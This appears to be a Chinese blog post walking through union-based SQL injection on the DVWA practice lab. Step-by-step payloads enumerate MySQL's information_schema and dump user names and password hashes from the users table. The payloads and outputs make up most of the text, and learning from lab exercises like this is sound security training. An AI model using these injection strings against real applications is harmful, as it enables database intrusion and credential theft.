dvwa sql mysql5 注
来源:互联网 发布:mac怎么玩ios手游 编辑:程序博客网 时间:2024/05/02 00:36
Mysql5内置的系统数据库IFORMATION_SCHEMA,其中记录了Mysql中所有
存在数据库名、数据库表、表字段。
重点要求研究几个对SQL注入有用的数据表说明:
// 英文版的单引号 从txt复制到word里面就会变成中文版的。。蛋疼。。注意。
1.得到所有数据库名:
|SCHEMATA ->存储数据库名的表
|---字段:SCHEMA_NAME ->数据库名称
|TABLES ->存储表名
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
|---字段:TABLE_NAME ->存储表的表名
|COLUMNS ->存储的字段名表
|---字段:TABLE_SCHEMA ->该字段所属数据库名
|---字段:TABLE_NAME ->存储所属表的名称
|---字段:COLUMN_NAME ->该字段的名称
以下是 对 dvwa 。 1. sql注入:
注入记录:
1' order by 2 # 返回正常
1’order by 3 # 返回错误
表示有两个字段
爆数据库版本:
-1' union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()) #
First name: 1
Surname: root@localhost : dvwa : 5.0.22-community-nt
数据库是mysql5的
爆出数据库
-1' union select 1,SCHEMA_NAME from information_schema.SCHEMATA limit 1,3 #
Limit后面的数字可以变换 这里我们从系统数据表中 发现有三个数据表
ID: -1' union select 1,SCHEMA_NAME from information_schema.SCHEMATA limit 1,3 #
First name: 1
Surname: dvwa
ID: -1' union select 1,SCHEMA_NAME from information_schema.SCHEMATA limit 1,3 #
First name: 1
Surname: mysql
ID: -1' union select 1,SCHEMA_NAME from information_schema.SCHEMATA limit 1,3 #
First name: 1
Surname: test
获取了数据库dvwa后 就可以爆出该数据库的表名:
-1' union select 1,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA = 'dvwa' limit 0,2 #
ID: -1' union select 1,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA = 'dvwa' limit 0,5 #
First name: 1
Surname: guestbook
ID: -1' union select 1,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA = 'dvwa' limit 0,5 #
First name: 1
Surname: users
表明在dvwa 数据库中存在两个表 guestbook users
显然 我们需要的是users表
接下来我们爆users表的字段吧:
-1' union select 1,COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME= 'users' limit 0,10 #
得出数据
:
ID: -1' union select 1,COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME= 'users' limit 0,10 #
First name: 1
Surname: user_id
ID: -1' union select 1,COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME= 'users' limit 0,10 #
First name: 1
Surname: first_name
ID: -1' union select 1,COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME= 'users' limit 0,10 #
First name: 1
Surname: last_name
ID: -1' union select 1,COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME= 'users' limit 0,10 #
First name: 1
Surname: user
ID: -1' union select 1,COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME= 'users' limit 0,10 #
First name: 1
Surname: password
ID: -1' union select 1,COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME= 'users' limit 0,10 #
First name: 1
Surname: avatar
显然有5个字段 我们需要的是 user 和password
接下来我们可以根据字段报数据了
-1' union select user,password from dvwa.users #
ID: -1' union select user,password from dvwa.users #
First name: admin
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
ID: -1' union select user,password from dvwa.users #
First name: gordonb
Surname: e99a18c428cb38d5f260853678922e03
ID: -1' union select user,password from dvwa.users #
First name: 1337
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
ID: -1' union select user,password from dvwa.users #
First name: pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: -1' union select user,password from dvwa.users #
First name: smithy
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
显而易见 admin 5f4dcc3b5aa765d61d8327deb882cf99
结束了。。
- dvwa sql mysql5 注
- DVWA平台之sql盲注学习
- sql手注实践之dvwa
- DVWA SQL Injection
- DVWA-WooYun SQL Injection
- dvwa sql 注入高级
- dvwa-SQL Injection
- dvwa-sql injection(blind)
- DVWA - SQL Injection (Blind) (low)
- 通过DVWA学习SQL盲注
- DVWA下的SQL注入
- DVWA
- DVWA
- DVWA
- sqlmap dvwa SQL Injection使用小记
- DVWA平台的sql注入学习
- SQL injection on DVWA (Low Level)
- SQL injection on DVWA (medium Level)
- Could not create the view: An unexpected exception was thrown. 电脑突然断电,myeclipse非正常关闭,出现错误
- 类选择符区别
- 再提LBS经纬度搜索和距离排序,求更优方案
- 《毛泽东传》读书笔记--童年
- 鸟哥私房菜2nd之Linux磁盘与文件系统管理 - 1/3
- dvwa sql mysql5 注
- MongoDb geohash
- 黑马程序员-集合框架2
- 链表的QuickSort快速排序法
- geoHash
- 泡面吧——简单的斐波那契序列
- 快速查找LOV语句
- Ubuntu MySQL下JAVA开发中乱码问题的解决
- 基于memcached的php锁机制实现